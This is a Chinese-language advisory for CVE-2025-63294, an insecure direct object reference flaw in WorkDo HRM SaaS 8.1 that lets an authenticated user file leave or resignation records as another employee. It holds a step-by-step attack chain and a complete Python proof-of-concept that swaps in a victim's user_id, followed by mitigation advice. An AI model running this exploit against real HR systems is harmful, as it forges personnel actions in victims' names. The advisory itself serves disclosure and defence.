CVE-2025-63294: WorkDo HRM SaaS权限绕过漏洞允许冒充其他用户操作

漏洞信息

漏洞编号

CVE-2025-63294

漏洞类型

不安全的权限控制

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

WorkDo HRM SaaS HR and Payroll Tool

漏洞概述

CVE-2025-63294是WorkDo HRM SaaS HR and Payroll Tool 8.1版本中存在的一个权限控制不当漏洞。该漏洞允许经过身份认证的低权限用户代表系统中的其他用户创建请假记录或离职记录，从而实现权限提升攻击。攻击者利用此漏洞可以在未经授权的情况下，以其他员工身份提交人力资源相关申请，可能导致数据泄露、欺诈性人事操作以及业务流程混乱等严重后果。

在正常的企业人力资源管理系统中，用户应该只能操作自己有权访问的数据和功能。然而，由于WorkDo HRM 8.1版本在处理请假和离职记录创建请求时缺乏充分的权限验证机制，攻击者可以通过篡改请求参数（如用户ID）来代表其他用户执行操作。这种不安全的直接对象引用（IDOR）问题使得任何经过认证的用户都能访问和修改其他员工的敏感人事信息。

该漏洞的CVSS评分为6.5，属于中等严重程度。攻击向量为网络形式，攻击者无需特殊权限即可发起攻击，但需要拥有有效的用户账户。攻击成功后，虽然不会直接导致系统可用性受损，但会对数据完整性和机密性造成严重影响，可能破坏企业人力资源管理流程的完整性和可信度。

技术细节

WorkDo HRM SaaS HR and Payroll Tool 8.1在处理用户请假和离职记录创建请求时存在不安全的直接对象引用（Insecure Direct Object Reference, IDOR）漏洞。该漏洞的根本原因在于服务端对用户提交的请求参数缺乏有效的身份验证和权限检查。

具体来说，当用户尝试创建请假记录或离职记录时，系统接收的参数中包含目标用户的标识信息（如user_id）。然而，服务端在处理这些请求时仅验证了当前请求发起者的身份（确保其为已认证用户），但未验证该用户是否有权代表参数中指定的目标用户执行操作。攻击者可以利用这一缺陷，通过拦截并修改HTTP请求中的用户标识参数，将目标用户ID替换为其他用户的ID，从而以该用户身份创建请假或离职记录。

利用此漏洞的攻击流程相对简单：1）攻击者首先使用自己的有效凭证登录系统；2）通过正常功能发起创建请假或离职记录的请求；3）使用代理工具拦截该请求；4）将请求中的user_id参数修改为受害者的用户ID；5）重放修改后的请求。服务端将错误地认为这是受害者本人发起的请求，并创建相应的记录。

此漏洞影响系统的数据完整性和业务流程的正常执行，可能导致未经授权的人事操作被记录在系统中，影响企业的正常人力资源管理秩序。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者首先注册或获取一个有效的WorkDo HRM系统用户账户，并登录系统收集可用的API端点和用户ID信息

STEP 2

步骤2: 身份验证

使用获取的有效凭证登录系统，建立经过认证的会话，获取有效的session token或cookie

STEP 3

步骤3: 请求拦截

通过正常功能入口发起创建请假或离职记录的请求，使用代理工具（如Burp Suite）拦截该HTTP请求

STEP 4

步骤4: 参数篡改

将请求中当前用户的user_id参数修改为目标受害者用户的user_id，其他参数保持不变或根据需要调整

STEP 5

步骤5: 请求重放

修改后的请求被重放至服务器，由于服务端仅验证了攻击者的身份但未验证操作权限，请求被成功处理

STEP 6

步骤6: 权限滥用完成

系统以受害者身份创建了请假或离职记录，攻击者成功实现了未授权操作，破坏了数据的完整性和业务流程

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3 """ CVE-2025-63294 PoC - WorkDo HRM SaaS IDOR Vulnerability This PoC demonstrates the IDOR vulnerability in WorkDo HRM SaaS HR and Payroll Tool 8.1 """ import requests import json TARGET_URL = "https://vulnerable-workdo-instance.com" ATTACKER_USERNAME = "[email protected]" ATTACKER_PASSWORD = "attacker_password" VICTIM_USER_ID = "12345" # ID of the victim user def authenticate(): """Authenticate as the attacker user""" session = requests.Session() login_data = { "email": ATTACKER_USERNAME, "password": ATTACKER_PASSWORD } response = session.post(f"{TARGET_URL}/api/auth/login", json=login_data) if response.status_code == 200: return session else: raise Exception("Authentication failed") def create_leave_record_as_victim(session): """Create a leave record on behalf of the victim user""" # Original request would have attacker's user_id # We modify it to use the victim's user_id leave_data = { "user_id": VICTIM_USER_ID, # IDOR: Using victim's ID "leave_type": "annual", "start_date": "2025-12-01", "end_date": "2025-12-05", "reason": "Vacation" } headers = { "Content-Type": "application/json", "X-CSRF-Token": session.cookies.get("csrf_token") } response = session.post( f"{TARGET_URL}/api/leave/create", json=leave_data, headers=headers ) return response def create_resignation_record_as_victim(session): """Create a resignation record on behalf of the victim user""" resignation_data = { "user_id": VICTIM_USER_ID, # IDOR: Using victim's ID "resignation_date": "2025-12-31", "reason": "Personal reasons" } headers = { "Content-Type": "application/json", "X-CSRF-Token": session.cookies.get("csrf_token") } response = session.post( f"{TARGET_URL}/api/resignation/create", json=resignation_data, headers=headers ) return response def main(): print("[*] CVE-2025-63294 PoC - WorkDo HRM IDOR Vulnerability") print(f"[*] Target: {TARGET_URL}") print(f"[*] Victim User ID: {VICTIM_USER_ID}") try: # Step 1: Authenticate as attacker print("\n[1] Authenticating as attacker...") session = authenticate() print("[+] Authentication successful") # Step 2: Create leave record as victim print("\n[2] Creating leave record on behalf of victim...") response = create_leave_record_as_victim(session) if response.status_code in [200, 201]: print("[+] Leave record created successfully as victim") print(f" Response: {response.json()}") else: print(f"[-] Failed to create leave record: {response.status_code}") # Step 3: Create resignation record as victim print("\n[3] Creating resignation record on behalf of victim...") response = create_resignation_record_as_victim(session) if response.status_code in [200, 201]: print("[+] Resignation record created successfully as victim") print(f" Response: {response.json()}") else: print(f"[-] Failed to create resignation record: {response.status_code}") except Exception as e: print(f"[-] Error: {str(e)}") if __name__ == "__main__": main()

影响范围

WorkDo HRM SaaS HR and Payroll Tool 8.1

防御指南

临时缓解措施

在官方补丁发布之前，可采取以下临时缓解措施：1）限制普通用户的API访问权限，禁用或限制创建请假和离职记录的功能；2）实施请求频率限制和异常行为检测，识别可疑的批量操作；3）启用增强的审计日志记录所有人事相关操作；4）通知用户避免在系统中存储过于敏感的信息；5）考虑暂时禁用批量操作或跨用户操作的功能，仅允许用户操作自己的数据；6）加强用户身份验证机制，如启用双因素认证；7）部署Web应用防火墙（WAF）规则，检测和阻止异常的IDOR攻击模式。